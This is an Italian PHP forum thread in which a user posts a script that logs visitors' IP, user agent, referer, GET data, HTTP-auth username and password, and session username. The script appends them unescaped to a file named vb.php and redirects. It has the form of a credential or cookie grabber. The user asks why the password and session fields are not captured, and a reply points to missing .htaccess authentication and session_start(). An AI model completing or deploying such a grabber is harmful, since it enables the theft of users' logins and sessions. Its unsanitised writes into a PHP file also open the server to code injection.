- Home
- Categorie
- Coding e Sistemistica
- PHP
- aiuto su php variabili
-
aiuto su php variabili
io ho questo file
[php]<?php$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$user = $HTTP_AUTH_USER;
$pw = $HTTP_AUTH_PW;
$us = $_SESSION['username'];$data = $_GET;
$time = date("Y-m-d G:i:s A");
$text = "<br><br>".$time." = ".$ip."<br><br>User Agent:".$agent."<br>Referer: ".$referer."<br>Session: ".$data."<br><br><br>User: ".$user."<br>Password: ".$pw."<br>Us: ".$us."<br>";
print($text);$file = fopen('vb.php' , 'a');
fwrite($file,$text);
fclose($file);
header("Location: ");?>[/php]le ultime 3 variabili non mi vengno postate come mai? cosa sbaglio?
-
Per la quarta e la quinta: hai creato l'autenticazione tramite il file .htaccess?
Per l'ultima invece, manca il session_start() all'inizio del file.
-
non ho creato niente.. quindi come verrebbe il codice?